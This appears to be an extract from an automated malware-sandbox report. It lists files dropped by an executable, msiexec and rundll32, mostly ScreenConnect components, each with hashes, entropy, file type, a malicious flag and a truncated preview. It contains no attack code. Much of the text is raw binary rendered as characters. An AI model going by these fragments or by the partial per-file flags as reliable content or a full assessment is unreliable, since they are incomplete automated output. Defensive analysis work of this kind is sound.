                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Users\user\Desktop\tmpzNIZ0YQ.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):321
                                                                Entropy (8bit):5.36509199858051
                                                                Encrypted:false
                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                MD5:1CF2352B684EF57925D98E766BA897F2
                                                                SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):1110630
                                                                Entropy (8bit):7.800118817272725
                                                                Encrypted:false
                                                                SSDEEP:24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
                                                                MD5:845B0569D54305E62C6E8FFE198D217C
                                                                SHA1:CD06C3D1554FE08099ADA4F4448A23A6422E6234
                                                                SHA-256:4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
                                                                SHA-512:AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):228
                                                                Entropy (8bit):5.069688959232011
                                                                Encrypted:false
                                                                SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):4.62694170304723
                                                                Encrypted:false
                                                                SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):36864
                                                                Entropy (8bit):4.340550904466943
                                                                Encrypted:false
                                                                SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):57344
                                                                Entropy (8bit):4.657268358041957
                                                                Encrypted:false
                                                                SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):5.775360792482692
                                                                Encrypted:false
                                                                SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.19884453207748
                                                                Encrypted:false
                                                                SSDEEP:384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
                                                                MD5:9260AFE4BBDE2549FC0B92F657C2E50A
                                                                SHA1:5580778A62B06D7B56D3F788727514551DE31647
                                                                SHA-256:588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
                                                                SHA-512:AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....*^.(......./...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5358
                                                                Entropy (8bit):5.152842845836485
                                                                Encrypted:false
                                                                SSDEEP:48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
                                                                MD5:8BD7F5FAA7C10C7BD3DADF217622D3C5
                                                                SHA1:DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
                                                                SHA-256:378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
                                                                SHA-512:0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1135
                                                                Entropy (8bit):5.055198370362517
                                                                Encrypted:false
                                                                SSDEEP:24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
                                                                MD5:7F75CED83D8C263A88A622A1E089B902
                                                                SHA1:4C14858C78B556A0D1A02D596F74059944AE7865
                                                                SHA-256:115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
                                                                SHA-512:C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) &gt; 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1768
                                                                Entropy (8bit):5.101132156143849
                                                                Encrypted:false
                                                                SSDEEP:48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
                                                                MD5:258C82001204536C091D6ABF60724339
                                                                SHA1:1C71A8427C60C962D655AD5199F1D68A049EE549
                                                                SHA-256:C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
                                                                SHA-512:3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):629
                                                                Entropy (8bit):5.130173870130788
                                                                Encrypted:false
                                                                SSDEEP:12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
                                                                MD5:31908D4B70E384C9F4D42CB05A28A73C
                                                                SHA1:7A69055E9EB8E482C009F12CF5E555585531663B
                                                                SHA-256:3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
                                                                SHA-512:ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5837
                                                                Entropy (8bit):5.223683802415461
                                                                Encrypted:false
                                                                SSDEEP:48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
                                                                MD5:144ADC93F53E457A1BFFA5372FD3C09B
                                                                SHA1:6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
                                                                SHA-256:D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
                                                                SHA-512:08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):741
                                                                Entropy (8bit):5.169072715134804
                                                                Encrypted:false
                                                                SSDEEP:12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
                                                                MD5:41DFF6114A921D7AC5637B8AC9F04DC4
                                                                SHA1:03880D70FA6A268C040025E90BC767D572BA36A0
                                                                SHA-256:2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
                                                                SHA-512:FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):165735
                                                                Entropy (8bit):4.0957845053651
                                                                Encrypted:false
                                                                SSDEEP:768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
                                                                MD5:4D5B6FB68883C7842D5397D54E85ABC2
                                                                SHA1:02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
                                                                SHA-256:6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
                                                                SHA-512:9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1564
                                                                Entropy (8bit):5.254408929629647
                                                                Encrypted:false
                                                                SSDEEP:24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
                                                                MD5:26E0BFF9194950526A0BA294210BAF79
                                                                SHA1:026D99742D35B1ECCB0DF29ECDA19CECE0387C88
                                                                SHA-256:248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
                                                                SHA-512:A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for sel
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42037
                                                                Entropy (8bit):5.478811092639316
                                                                Encrypted:false
                                                                SSDEEP:768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
                                                                MD5:3E2819DAE208FB16B35E83522C9E1E21
                                                                SHA1:325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
                                                                SHA-256:6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
